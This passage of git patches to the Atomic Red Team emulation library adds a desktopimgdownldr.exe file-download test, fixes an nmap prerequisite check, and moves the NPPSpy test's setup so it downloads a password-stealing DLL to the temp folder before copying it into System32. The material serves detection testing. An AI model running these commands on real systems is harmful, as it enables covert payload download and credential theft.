+the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) 
+and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
+| download_path | Local file path to save downloaded file | path | SYSTEMROOT=C:&#92;Windows&#92;Temp|
+| cleanup_path | path to delete file as part of cleanup_command | path | C:&#92;Windows&#92;Temp&#92;Personalization&#92;LockScreenImage|
+| cleanup_file | file to remove as part of cleanup_command | string | *.md|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr
+```
+
+#### Cleanup Commands:
+```cmd
+del #{cleanup_path}\#{cleanup_file}
+```
+
+
+
+
+
 <br/>
diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml
index 86e316cf..033b7eb6 100644
--- a/atomics/T1197/T1197.yaml
+++ b/atomics/T1197/T1197.yaml
@@ -83,6 +83,7 @@ atomic_tests:
       del #{local_file} >nul 2>&1
     name: command_prompt
 - name: Bits download using destktopimgdownldr.exe (cmd)
+  auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
   description: |
     This test simulates using destopimgdwnldr.exe to download a malicious file
     instead of a desktop or lockscreen background img. The process that actually makes 
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 16301ed5..c1428715 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -567,3 +567,4 @@ db020456-125b-4c8b-a4a7-487df8afb5a2
 804f28fc-68fc-40da-b5a2-e9d0bce5c193
 a55a22e9-a3d3-42ce-bd48-2653adb8f7a9
 9636dd6e-7599-40d2-8eee-ac16434f35ed
+afb5e09e-e385-4dee-9a94-6ee60979d114

From 85f4f0ec3f7213c9d19905458b593c68fb10aef6 Mon Sep 17 00:00:00 2001
From: Laken Harrell <harrell.laken@gmail.com>
Date: Thu, 20 Aug 2020 15:37:47 -0500
Subject: [PATCH 16/19] fixed prereq_command (#1205)

Co-authored-by: Harrell <LHarrell@nti.local>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1046/T1046.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml
index 3c64514c..76b80f16 100644
--- a/atomics/T1046/T1046.yaml
+++ b/atomics/T1046/T1046.yaml
@@ -71,7 +71,7 @@ atomic_tests:
   dependencies:
   - description: |
       NMap must be installed
-    prereq_command: 'if (cmd /c nmap 2>nul) {exit 0} else {exit 1}'
+    prereq_command: 'if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}'
     get_prereq_command: |
       Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url}
       Start-Process $env:temp\nmap-7.80-setup.exe /S

From 1411b5ec4a06ea5570c9431d4b41121fd42d8d7d Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Thu, 20 Aug 2020 20:38:40 +0000
Subject: [PATCH 17/19] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/Indexes/index.yaml | 2 +-
 atomics/T1046/T1046.md     | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 52dc0d30..381ee6c8 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -38989,7 +38989,7 @@ discovery:
       - description: 'NMap must be installed
 
 '
-        prereq_command: if (cmd /c nmap 2>nul) {exit 0} else {exit 1}
+        prereq_command: if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
         get_prereq_command: |
           Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url}
           Start-Process $env:temp\nmap-7.80-setup.exe /S
diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md
index 386cb316..76b28f50 100644
--- a/atomics/T1046/T1046.md
+++ b/atomics/T1046/T1046.md
@@ -120,7 +120,7 @@ nmap #{host_to_scan}
 ##### Description: NMap must be installed
 ##### Check Prereq Commands:
 ```powershell
-if (cmd /c nmap 2>nul) {exit 0} else {exit 1} 
+if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} 
 ```
 ##### Get Prereq Commands:
 ```powershell

From f7584be904dd92854ce9a18b11cf0572a017d3ae Mon Sep 17 00:00:00 2001
From: Geoff Galitz <ggalitz@shutterstock.com>
Date: Thu, 20 Aug 2020 21:40:09 +0100
Subject: [PATCH 18/19] T1003 NPPSPY GetPrereqs location fix (#1202)

* Before:  NPPSPY is installed into atomics src directories, test
looks for it in the local temp directory resulting in an error.

After: Test is changed to look for NPPSPY directly in atomics src
directory

* Change test to install prereq to local temp directory and work from
there.

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1003/T1003.yaml | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)

diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
index 982a43a7..2374e2ae 100644
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -77,11 +77,10 @@ atomic_tests:
   - windows
   dependency_executor_name: powershell
   dependencies:
-  - description: NPPSpy.dll must exist in PathToAtomicsFolder\T1003\bin directory
-    prereq_command: if (Test-Path "PathToAtomicsFolder\T1003\bin\NPPSpy.dll") {exit 0} else {exit 1}
+  - description: NPPSpy.dll must be available in local temp directory 
+    prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
     get_prereq_command: |-
-      $rv = mkdir PathToAtomicsFolder\T1003\bin
-      Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\T1003\bin\NPPSpy.dll"
+      Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
   executor:
     command: |-
       Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
@@ -103,4 +102,4 @@ atomic_tests:
       Remove-Item C:\NPPSpy.txt -ErrorAction Ignore
       Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
     name: powershell
-    elevation_required: true
\ No newline at end of file
+    elevation_required: true

From 04a409832e83b12ef33b044ee9afc2d004d5a121 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Thu, 20 Aug 2020 20:40:34 +0000
Subject: [PATCH 19/19] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/Indexes/index.yaml | 11 +++++------
 atomics/T1003/T1003.md     |  7 +++----
 2 files changed, 8 insertions(+), 10 deletions(-)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 381ee6c8..8d1ef367 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -19629,12 +19629,11 @@ credential-access:
       - windows
       dependency_executor_name: powershell
       dependencies:
-      - description: NPPSpy.dll must exist in PathToAtomicsFolder\T1003\bin directory
-        prereq_command: if (Test-Path "PathToAtomicsFolder\T1003\bin\NPPSpy.dll")
-          {exit 0} else {exit 1}
-        get_prereq_command: |-
-          $rv = mkdir PathToAtomicsFolder\T1003\bin
-          Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\T1003\bin\NPPSpy.dll"
+      - description: NPPSpy.dll must be available in local temp directory
+        prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit
+          1}
+        get_prereq_command: Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll
+          -OutFile "$env:Temp\NPPSPY.dll"
       executor:
         command: |-
           Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md
index 30be8e5c..f86d38f3 100644
--- a/atomics/T1003/T1003.md
+++ b/atomics/T1003/T1003.md
@@ -145,15 +145,14 @@ Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
 
 
 #### Dependencies:  Run with `powershell`!
-##### Description: NPPSpy.dll must exist in PathToAtomicsFolder\T1003\bin directory
+##### Description: NPPSpy.dll must be available in local temp directory
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "PathToAtomicsFolder\T1003\bin\NPPSpy.dll") {exit 0} else {exit 1} 
+if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} 
 ```
 ##### Get Prereq Commands:
 ```powershell
-$rv = mkdir PathToAtomicsFolder\T1003\bin
-Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\T1003\bin\NPPSpy.dll"
+Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
 ```